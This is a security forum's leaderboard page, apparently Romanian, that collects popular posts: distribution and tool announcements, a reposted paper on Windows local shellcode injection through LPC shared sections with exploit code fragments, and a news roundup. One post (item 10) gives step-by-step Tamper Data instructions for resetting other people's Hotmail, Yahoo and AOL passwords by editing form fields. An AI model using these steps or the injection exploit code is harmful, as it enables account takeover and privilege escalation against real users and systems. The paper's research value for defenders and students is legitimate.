Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 05/01/12 in all areas

  1. Puteti sa alegeti distributia, centos 5/6 sau debian 5/6 http://members.host1free.com/vps?ac=h1f_register_vps Va descurcati de aici
    1 point
  2. The BackBox team has announce the release 2.05 of BackBox Linux. The new release include features such as Ubuntu 11.04, Linux Kernel 2.6.38 and Xfce 4.8.0. BackBox is a Linux distribution based on Ubuntu. It has been developed to perform penetration tests and security assessments. Designed to be fast, easy to use and provide a minimal yet complete desktop environment, thanks to its own software repositories, always being updated to the latest stable version of the most used and best known ethical hacking tools. What's new System upgrade Bug corrections Performance boost Improved start menu Improved WiFi driver (compat-wireless aircrack patched) New Hacking tools: creepy, fern-wifi-cracker, joomscan, pyrit, reaver, xplico, etc. Updated tools: crunch, fimap, hydra, magictree, metasploit, set, sipvicious, skipfish, w3af, weevely, wireshark, wirouterkeyrec, wpscan, zaproxy, theharvester, xsser, etc. Download Backbox 2.05
    1 point
  3. Un mic programel facut in intregime de mine . Momentan se bazeaza doar pe CPU , dar pe viitor sper sa reusesc sa il implementez si cu GPU. Descriere pe scurt : introduceti caracterele din care sa fie compuse parolele din lista , lungimea parolelor , si el le genereaza . Sursa: Ideone.com | Online C++ Compiler & Debugging Tool Download : Download pwgen.exe for free on uploading.com Virus scan : https://www.virustotal.com/file/c5018939bbc636d33c34c0112b662ea2fe958a7929167153403fd4fc58a75932/analysis/1335868469/
    1 point
  4. Catalog of key Windows kernel data structures During our Windows internals and debugging classes, students frequently ask us questions along the lines of - "What data structure does the Windows kernel use for a mutex?". This article attempts to answer such questions by describing some of the key data structures that are used by the Windows kernel and device drivers. This article lays emphasis on the relationship of a structure with others in the system, helping the reader navigate through these structures in the kernel debugger. While reading this article, the reader is encouraged to have a kernel debugger readily available to try out the debugger commands and examine the structures and their fields. This article is intended to be a reference, not a tutorial. For each structure, this article provides a high level description of the structure, followed by details of some of the important fields that point to other structures. If applicable, debugger commands that apply to the structure and functions that manipulate the structure are provided. Most of the data structures mentioned in this article are allocated by the kernel from paged or non-paged pool, which is a part of the kernel virtual address space. The following data structures are discussed in this document, click on any of them to directly go to the description. Doubly Linked List : LIST_ENTRY Process and Thread : EPROCESS, KPROCESS, ETHREAD, KTHREAD Kernel and HAL : KPCR, KINTERRUPT, CONTEXT, KTRAP_FRAME, KDPC, KAPC, KAPC_STATE Synchronization Objects : DISPATCHER_HEADER, KEVENT, KSEMAPHORE, KMUTANT, KTIMER, KGATE, KQUEUE Executive & RTL : IO_WORKITEM I/O Manager : IRP, IO_STACK_LOCATION, DRIVER_OBJECT, DEVICE_OBJECT, DEVICE_NODE, FILE_OBJECT Objects and Handles : OBJECT_HEADER, OBJECT_TYPE, HANDLE_TABLE_ENTRY Memory Manager : MDL, MMPTE, MMPFN, MMPFNLIST, MMWSL, MMWSLE, POOL_HEADER, MMVAD Cache Manager : VACB, VACB_ARRAY_HEADER, SHARED_CACHE_MAP, PRIVATE_CACHE_MAP, SECTION_OBJECT_POINTERS Gasiti tot aici: CodeMachine - Article - Catalog of key Windows kernel data structures
    1 point
  5. 1 point
  6. Bitdefender USB Immunizer Bitdefender USB Immunizer is a free and easy to use tool that helps make sure you transfer the files, not the viruses. It disables autorun-related threats before they access the computer. Once installed, it constantly watches for newly inserted USB storage devices and immunizes them on the fly. Download: http://labs.bitdefender.com/wp-content/plugins/download-monitor/download.php?id=BDUSBImmunizerLauncher.exe Sursa: Free Anti-Virus Programs, Plugins and Apps - Bitdefender
    1 point
  7. WLSI Windows Local Shellcode Injection Author: Cesar Cerrudo (cesar>.at.<argeniss>.dot.<com) Argeniss – Information Security Abstract: This paper describes a new technique to create 100% reliable local exploits for Windows operating systems, the technique uses some Windows operating systems design weaknesses that allow low privileged processes to insert data on almost any Windows processes no matter if they are running under high privileges. We all know that local exploitation is much easier than remote exploitation but it has some difficulties. After a brief introduction and a description of the technique, a couple of samples will be provided so the reader will be able to write his/her own exploits. Introduction: When writing a local Windows exploit you can face many problems: -Different return addresses: -Because different Windows versions. -Because different Windows service pack level. -Because different Windows languages. -Limited space for shellcode. -Null byte restrictions. -Character set restrictions. -Buffer overflows/exploits protections. -Etc. To bypass those restrictions an exploit has to use many different return addresses and/or techniques. After you finish reading this paper you won't have to worry any more about that because it will be very easy to write a 100% reliable exploit that will work on any Windows version, service pack level, language, etc. and could bypass buffer overflows/exploits protections since the code won't be executed from the stack nor the heap and it won't use a fixed return address. This technique relies in the use of Windows LPC (Local/Lightweight Procedure Call), this is an inter-process communication mechanism, RPC (Remote Procedure Call) uses LPC as a transport for local communications. LPC allow processes to communicate by "messages" using LPC ports. LPC is not well documented and here won't be detailed but you can learn more at the links listed on references section. LPC ports are Windows objects, servers (processes) can create named LPC ports to which clients (processes) can connect by referencing their names. You can see processes LPC ports using Process Explorer from Windows Sysinternals: Documentation, downloads and additional resources, by selecting a process in the upper panel and then looking at the lower panel at the Type column, they are identified by the word Port, you can see the port name, handle and by double clicking you can see additional information like permissions, etc. LPC is heavily used by Windows internals, also by OLE/COM, etc. this means that almost every Windows process has a LPC port. LPC ports can be protected by ACLs so sometimes a connection can not be established if the client process doesn't have proper permissions. To use this technique we will need to use a couple of APIs that will be detailed below. Establishing a connection to a LPC port: In order to establish a connection to a LPC port the next native API NtConnectPort from Ntdll.dll is used. NtConnectPort( OUT PHANDLE ClientPortHandle, IN PUNICODE_STRING ServerPortName, IN PSECURITY_QUALITY_OF_SERVICE SecurityQos, IN OUT PLPCSECTIONINFO ClientSharedMemory OPTIONAL, OUT PLPCSECTIONMAPINFO ServerSharedMemory OPTIONAL, OUT PULONG MaximumMessageLength OPTIONAL, IN OUT PVOID ConnectionInfo OPTIONAL, IN OUT PULONG ConnectionInfoLength OPTIONAL ); ClientPortHandle: pointer to the port handle returned by the function. ServerPortName: pointer to a UNICODE_STRING structure that holds the port name to which the function will connect to. SecurityQos: pointer to a SECURITY_QUALITY_OF_SERVICE structure. ClientSharedMemory: pointer to a LPCSECTIONINFO structure, used for shared section information. ServerSharedMemory: pointer to a LPCSECTIONMAPINFO structure, used for shared section information. MaximumMessageLength: pointer to maximum message size number returned by function. ConnectionInfo: pointer to a buffer of message data, this data is sent and returned to and from LPC server. ConnectionInfoLength: pointer to the length of message data. There are others LPC APIs but they won't be detailed here because they won't be used by this technique, if you want to learn more look at the references section. To establish a connection the most important values we have to supply are: the LPC port name in an UNICODE_STRING structure: typedef struct _UNICODE_STRING { USHORT Length; //length of the unicode string USHORT MaximumLength; //length of the unicode string +2 PWSTR Buffer; //pointer to the unicode string } UNICODE_STRING; the LPCSECTIONINFO structure values: typedef struct LpcSectionInfo { DWORD Length; //length of the structure HANDLE SectionHandle; //handle to a shared section DWORD Param1; //not used DWORD SectionSize; //size of the shared section DWORD ClientBaseAddress; //returned by the function DWORD ServerBaseAddress; //returned by the function } LPCSECTIONINFO; to fill this structure a shared section (see [1] for more info on shared sections) has to be created, this shared section will be mapped on both processes (the one which we are connecting from and the target process we are connecting to) after a successful connection. On LPCSECTIONMAPINFO structure we only have to set the length of the structure: typedef struct LpcSectionMapInfo{ DWORD Length; //structure length DWORD SectionSize; DWORD ServerBaseAddress; } LPCSECTIONMAPINFO; SECURITY_QUALITY_OF_SERVICE structure can have any value, we don't have to worry about it: typedef struct _SECURITY_QUALITY_OF_SERVICE { DWORD Length; SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; DWORD ContextTrackingMode; DWORD EffectiveOnly; } SECURITY_QUALITY_OF_SERVICE; for ConnectionInfo data we can use a buffer with 100 null elements, ConnectionInfoLength should have the length of the buffer. Creating a shared section: For using this technique before a connection to a LPC port is established we need to create a shared section. To create a shared section the next native API NtCreateSection from Ntdll.dll is used. NtCreateSection( OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL ); SectionHandle: pointer to a section handle returned by the function. DesiredAccess: specify the kind of access desired: read, write, execute, etc. ObjectAttributes: pointer to a OBJECT_ATTRIBUTES structure. MaximunSize: pointer to the size of the section when creating a shared memory section. PageAttributes: memory page attributes: read, write, execute, etc. SectionAttributes: section attributes depending on the kind of section to be created. FileHandle: handle to a file when creating a file mapping. We only have to care about the next parameters: For DesiredAccess parameter we have to set what access to the section we want to have, we will need read and write access. On MaximunSize we have to set the size of the section we want, this can be any value but it should be enough to hold the data we will put later. For PageAttributes we have to set also read and write, finally for SectionAttributes we have to set it to committed memory. The technique: Now that we know the APIs needed to establish a LPC connection let's see how this technique works. As I said most Windows processes have LPC ports to which we can connect (if we have proper permissions), as you have seen on the NtConnectPort API parameters we can supply a shared section on one of the structures, this shared section will be mapped on both processes that are part of the communication, this is really good news, why this is so good? because it means that “all” the stuff we put on our process shared section will be instantly mapped on the other process, this is really crazy we can inject any data (shellcode of course!!!) on any process we want no matter if the process is running with higher privileges than our process!. What is more amazing is that the address where the shared section is mapped at the target process will be returned by the function!!!, if you don't know yet why this is so good you should go and learn how to write exploits before continuing reading this . Basically when exploiting a vulnerability using LPC we will be able to put shellcode on target process and we will know exactly were the shellcode is located, so we only have to make the vulnerable process to jump to that address and voila!, that's all. For instance if you want to put code on smss.exe process you have to create a shared section, connect to \DbgSsApiPort LPC port, then put the code on the shared section and that code will be instantly mapped on smss.exe address space, or maybe you want to put code on services.exe process, do the same as described before but connecting to \RPC Control\DNSResolver LPC port. This technique has the following pros: · Windows language independent. · Windows service pack level independent. · Windows version independent. · No shellcode size restrictions. · No null byte restrictions, no need to encode. · No character set restrictions. · Bypass some exploit/overflow protections. · Quick exploit development. This technique has the following cons: · Few processes haven't a LPC port, not very likely, most Windows processes have one. · Couldn't work if the vulnerability is a buffer overflow caused by an ASCII string, because sometimes the server shared section address at the server process is 0x00XX0000, this is not very likely, most (if not all) buffer overflow vulnerabilities on Windows are caused by Unicode strings, also this problem can be solved by connecting multiple times to a LPC port until a good address is returned. Building an exploit: Basically an exploit using this technique will have to do the next: · Create a shared section to be mapped on LPC connection. · Connect to vulnerable process LPC port specifying the previously created shared section. After a successful connection two pointers to the shared section are returned, one for the shared section at client process and one for the server process. · Copy shellcode to shared section mapped at client process. This shellcode will be instantly mapped on target process. · Trigger the vulnerability making vulnerable process jump to the shared section where the shellcode is located. This is done by overwriting return addresses, pointers, etc. with the pointer to the server process shared section. Let's see a simple sample exploit for a fictitious vulnerability on service XYZ where VulnerableFunction() takes a Unicode string buffer and sends it to XYZ service where the buffer length is not properly validated. While this sample is based on a buffer overflow vulnerability this technique is not limited to this kind of bugs, it can be used on any kind of vulnerabilities as you can see on the exploits available with this paper (see Sample Exploits). The next code creates a committed shared memory section of 0x10000 bytes with all access (read, write, execute, etc.) and with read and write page attributes: -----Code begins------ HANDLE hSection=0; LARGE_INTEGER SecSize; SecSize.LowPart=0x10000; SecSize.HighPart=0x0; if(NtCreateSection(&hSection,SECTION_ALL_ACCESS,NULL,&SecSize, PAGE_READWRITE,SEC_COMMIT ,NULL)) printf(“Could not create shared section. \n”); -----Code ends------ The following code connects to a LPC Port named LPCPortName, passing the handle and size of a previously created shared section, this section will be mapped on both processes participating on the connection after a successful connection: -----Code begins------ HANDLE hPort; LPCSECTIONINFO sectionInfo; LPCSECTIONMAPINFO mapInfo; DWORD Size = sizeof(ConnectDataBuffer); UNICODE_STRING uStr; WCHAR * uString=L"\\LPCPortName"; DWORD maxSize; SECURITY_QUALITY_OF_SERVICE qos; byte ConnectDataBuffer[0x100]; for (i=0;i<0x100;i++) ConnectDataBuffer=0x0; memset(&sectionInfo, 0, sizeof(sectionInfo)); memset(&mapInfo, 0, sizeof(mapInfo)); sectionInfo.Length = 0x18; sectionInfo.SectionHandle =hSection; sectionInfo.SectionSize = 0x10000; mapInfo.Length = 0x0C; uStr.Length = wcslen(uString)*2; uStr.MaximumLength = wcslen(uString)*2+2; uStr.Buffer =uString; if (NtConnectPort(&hPort,&uStr,&qos,(DWORD *)&sectionInfo,(DWORD *)&mapInfo, &maxSize,(DWORD*)ConnectDataBuffer,&Size)) printf(“Could not connect to LPC port.\n”); -----Code ends------ After a successful connection pointers to the beginning of the mapped shared section on client process and the server process is returned on sectionInfo.ClientBaseAddress and sectionInfo.ServerBaseAddress respectively. The next code copies the shellcode to the client mapped shared section: -----Code begins------ _asm { pushad lea esi, Shellcode mov edi, sectionInfo.ClientBaseAddress add edi, 0x10 //avoid 0000 lea ecx, End sub ecx, esi cld rep movsb jmp Done Shellcode: //place your shellcode here End: Done: popad } -----Code ends------ The next code triggers the vulnerability making vulnerable process jump to the server mapped shared section: -----Code begins------ _asm{ pushad lea ebx, [buffer+0xabc] mov eax, sectionInfo.ServerBaseAddress add eax, 0x10 //avoid 0000 mov [ebx], eax //set pointer to server shared section to overwrite return address popad } VulnerableFunction(buffer); //trigger the vulnerability to get shellcode execution -----Code ends------ Problems with LPC ports: There are some problems when exploiting using LPC: 1. Some LPC port names are dynamic (ie: ports used by OLE/COM), this means that the name of the port changes all the time when it's created by a process. 2. A few LPC ports have strong ACL and won't let us to connect unless we have enough permissions. 3. Some LPC ports need some specific data to be passed on ConnectionInfo parameter in order to let us establish a connection. To solve problem #1 we have 2 alternatives, the first one is to reverse engineering how LPC port names are resolved but this is very time consuming and I'm very lazy so we have the second alternative (the easy one which is to hook certain function to get the port name. When working with automation (OLE/COM) before connecting to the port the client process resolves the name of target server LPC port by some black magic, this is all done automatically by COM/OLE functionality, reverse engineering all this seems complicated, but what we can do is to hook the NtConnectPort API so we can get the target port name when the function tries to connect to the port. This method can be seen on one of the exploits available with this paper (see Sample Exploits). Problem #2 seems impossible to solve, did I say impossible, sorry that word doesn't exist on hacker dictionary , right now it seems it can't be solved but LPC is so obscure and I have seen some weird things on LPC that I'm not 100% sure. It's possible to connect indirectly to an LPC port “bypassing” permissions but it seems difficult to have a shared section created, I should go deep on this when I have some free time . Problem #3 can be easily solved by reverse engineering how the connection to the problematic port is established. Just debug, set a breakpoint on NtConnectPort API and look at parameters values and then try to use the same values on the exploit. Sample Exploits: To see this technique in action take a look at the exploits available with this paper: • SSExploit2 • MS05-012 - COM Structured Storage Vulnerability - CAN-2005-0047 • TapiExploit • MS05-040 - Telephony Service Vulnerability – CAN-2005-0058 Conclusion: As you have seen it is very easy to build almost 100% reliable (I'm saying “almost” because not all vulnerabilities are easy to exploit and a few are complex to exploit in a reliable way) exploits by using this technique, building a simple local stack overflow multi language and service pack independent exploit will take you no more than 5-10 minutes, at least that was what it took me to build the local TAPI (MS05-040) exploit Sursa: http://www.exploit-db.com/wp-content/themes/exploit/docs/12.pdf
    1 point
  8. prefer asta: Ninja Pendisk nu am avut probleme pana acum
    1 point
  9. Cu mult timp in urma am realizat acest proiect foarte interesant si anume Yala cu cititor de card. Montajul este realizat cu microcontrolerul AVR ATtiny26, pe care l-am programat ulterior. Dupa realizarea practica a montajului am construit si cititorul de cartele telefonice ROMTELECOM, caci nu aveam un cititor standard. Dupa cum se poate vedea in poza atasata am adaptat dimensiunile cartelelor la solutia aleasa de mine. Bineinteles cine are un asemenea cititor standard de cartele telefonice nu mai trebuie sa le taie cum am facut eu. Pentru inregistrarea cartelei se introduce aceasta in cititor, aprinzandu-se led-ul rosu. Se apasa butonul SW2 de pe schema si se realizeaza inregistrarea cartelei in memorie aprinzandu-se led-ul verde. Tot asa se va proceda pana la cea de-a 8 cartele. Pentru stergerea unei cartele se procedeaza la fel, dar se apasa de asemenea butonul SW3. O cartela inregistrata va aprinde led-ul verde(ceea ce permite accesul), iar una neinregistrata va aprinde led-ul rosu(acces respins). Montajul functioneaza de la prima incercare nemaifiind necesare alte reglaje. Microcontrolerul l-am programat cu PONYPROG, realizand pentru aceasta o schema dedicata acestui scop. imagini:http://electrodb.ro/wp-content/uploads/2011/06/fata.jpg http://electrodb.ro/wp-content/uploads/2011/06/kit-complet.jpg http://electrodb.ro/wp-content/uploads/2011/06/programator-AVR.jpg Schema programatorui se afla la AVR Programmer. Tot proiectul se afla la Electronic safety-lock with telecars as key Spor la lucru pentru cei interesati. Sursa:http://electrodb.ro/atelier/microcontroler/atmel/safety-lock-cu-avr-attiny26/comment-page-1/#comment-1342 http://www.serasidis.gr/circuits/safety_lock/safety_lock.htm P.S Cu cva timp in urma cautam un proiect interesant de care sa ma apuc si lam gasit pe acesta fiind foarte interesant;)
    1 point
  10. Yesterday we Reported a 0-Day Vulnerability in Hotmail, which allowed hackers to reset account passwords and lock out the account's real owners. Tamper Data add-on allowed hackers to siphon off the outgoing HTTP request from the browser in real time and then modify the data.When they hit a password reset on a given email account they could fiddle the requests and input in a reset they chose. Microsoft spokesperson confirmed the existence of the security flaw and the fix, but offered no further details: “On Friday, we addressed an incident with password reset functionality; there is no action for customers, as they are protected.” Later Today another unknown hacker reported another similar vulnerabilities in Hotmail, Yahoo and AOL. Using same Tamper Data add-on attacker is able to Reset passwords of any account remotely. This is somewhat a critical Vulnerability ever exposed, Millions of users can effected in result. Here Below Hacker Demonstrated Vulnerabilities: Step 1. Go to this page https://maccount.live.com/ac/resetpwdmain.aspx . Step 2. Enter the Target Email and enter the 6 characters you see. Step 3. Start Tamper Data Step 4. Delete Element "SendEmail_ContinueCmd" Step 5. change Element "__V_previousForm" to "ResetOptionForm" Step 6. Change Element "__viewstate" to "%2FwEXAQUDX19QDwUPTmV3UGFzc3dvcmRGb3JtZMw%2BEPFW%2 Fak6gMIVsxSlDMZxkMkI" Step 7. Click O.K and Type THe new Password Step 8. sTart TamperDaTa and Add Element "__V_SecretAnswerProof" Proof not constant Like the old Exploit "++++" You need new Proof Every Time http://www.youtube.com/watch?feature=player_embedded&v=wdyDN82Egaw 2.Yahoo Step 1. Go to this page https://edit.yahoo.com/forgot . Step 2. EnTer the Target Email . and Enter the 6 characters you see . Step 3. Start Tamper Data Delete Step 4. change Element "Stage" to "fe200" Step 5. Click O.K and Type The new Password Step 6. Start Tamper Data All in Element Z 3.AOL http://3.bp.blogspot.com/-e8PtNqMamkA/T5w58OgG-KI/AAAAAAAAF6g/88O-NuSiLHo/s640/1.png Step 1. Go to Reset Page Step 2. EnTer the Target Email . and Enter the characters you see . Step 3. Start Tamper Data Step 4. change Element "action" to "pwdReset" Step 5. change Element "isSiteStateEncoded" to "false" Step 6. Click O.K and Type THe new Password Step 7. Start TamperDaTa All in Element rndNO Step 8. done Source:Yet Another Hotmail, AOL and Yahoo Password Reset 0Day Vulnerabilities | The Hacker News
    1 point
  11. Din cate stiu eu au fost fixate dar acum 1-2 saptamani functionau fara nici o problema!
    1 point
  12. eu mi l-am ales dupa ce am vazut toate cele 5 serii La Femme Nikita (TV series) - Wikipedia, the free encyclopedia scuze de post dublu, am apasat si nu a luat asa ca am mai apasat odata si vad ca nu ma lasa sa imi sterg topicurile proprii...
    1 point
  13. Dat fiind c? îmi place s? m?nânc semin?e de floarea soarelui ?i s? pun spa?iu dup? virgul?, nu înainte, nick-ul ?sta a fost o alegere natural?, ceea ce v? doresc ?i vou?. 2894, un lot bun.
    1 point
  14. la intamplare dupa care l-am folosit des
    1 point
  15. [h=3]Security Week In Review, April 23-27[/h] Infections and exploits plagued this week in security, affecting everything from the Mac OS X to Oracle database servers. High profile leaks and a passage of a controversial information sharing bill also graced the security landscape. Here’s a look at April 23-27. VMware Source Code Leaked: Last week, VMware confirmed an attack that led to the online publication of source code for its ESX hypervisor and said that more could be on the way. The individual stepping up to take credit for the attack was a hacker going by the handle of Hardcore Charlie, who also claimed responsibility for another hack on military contractor China National Import & Export Corp earlier this month. “The fact that the source code may have been publicly shared does not necessarily mean that there is any increased risk to VMware customers. VMware proactively shares its source code and interfaces with other industry participants to enable the broad virtualization ecosystem today,” said Iain Mulholland director of the VMware Security Response Center, in a blog post. Hardcore Charlie also tweeted that he possessed EMC source code, which he said he also planned to post. Microsoft Fixes Hotmail Password Flaw: Redmond patched a password reset vulnerability in its Hotmail Web mail service last week that potentially exposed its more than 360 million users to account compromises. Specifically, the glitch enabled miscreants with a Firefox add-on to circumvent security restrictions and remotely reset the password of a Hotmail account by modifying the data, while also enabling them to decode CAPTCHA and send automated values over the MSL Live Hotmail module. When the reset button was hit, hackers could then manipulate the requests and put in their own reset information. Luckily for Hotmail’s 360 million users, the bug was discovered and repaired in a relatively short window of time. Microsoft got wind of the vulnerability April 20 and issued a fixed the following day. The fix went public at the end of last week. House Passes CISPA Bill: The controversial Cyber Information Sharing and Protection Act passed in the House of Representatives by a vote of 248 to 168 at the end of last week, despite a strong public backlash from privacy advocates and academia who asserted that the move violated privacy rights. Specifically, the bill, supported by firms such as Facebook, financial trade associations, AT&T, utilities, Intel, and several tech companies, among others, gives the federal government a lot of leeway to share classified cyber threat information with U.S. companies. The bill also simultaneously eliminates many restrictions to information sharing between organizations. The bill’s chief supporter and architect Mike Rogers applauded the legislation as a move in the right direction toward the comprehensive protection of U.S. networks against cyber spies and thieves from Russia and China. However, CISPA’s opponents, including the Center for Democracy and Technology, as well as the ACLU, called the bill ‘overly broad’ and contended that it would serve to erode users’ Internet freedoms and privacy. Oracle Suffers Critical Glitch: A critical vulnerability enabling remote code execution in all versions of the Oracle database server remains unpatched even after Oracle attempted to fix the flaw with its April Critical Patch Update, according to reports circulating last week. Specifically, the vulnerability, occurring in the TNS Listener service, a function which routes connection requests from clients to the server, allows attackers to intercept server traffic and execute malicious commands on the system. The vulnerability exists in all Oracle versions, affecting customers using 8i, 9i, 10g, and 11g (11g R2). If exploited, a remote attacker has complete control of the data exchanged between the server database and the client machines, which paves the way for miscreants to hijack users’ sessions and inject code to do their malicious bidding. Oracle recently patched the flaw TNS Listener service in its April update. However it turns out that the fix didn’t apply to current versions of the Oracle database, leaving many customers subject to arbitrary attacks aiming to exploit the vulnerability. New Flashback Variant Attack Macs: Yet another Flashback variant was discovered sweeping through users’ Mac OS X machines last week. This time, Mac security firm Intego reported the pesky Mac malware installs on users’ computers without requiring a password. The latest Flashback version, known as Flashback.S, inserts itself in one of the user’s home folders that include ~/Library/LaunchAgents/com.java.update.plist or ~/.jupdate. Once it has completely installed itself, the malware then deletes all files and folders in ~/Library/Caches/Java/cache in order to eliminate the applet from the infected Mac, and avoid detection or sample recovery, according to Intego. The Mac-focused Flashback Trojan was first discovered in September 2011, impersonating a bogus Adobe Flash Player installer. The malware has since gone on a rampage against the Mac OS X platform with numerous variants that have exploited a slew of Java vulnerabilities, ultimately infecting as many as 650,000 machines, according to reports. by Stefanie Hoffman | April 30, 2012 at 5:05 pm Sursa: Security Week In Review, April 23-27 | Fortinet Security Blog
    -1 points
×
×
  • Create New...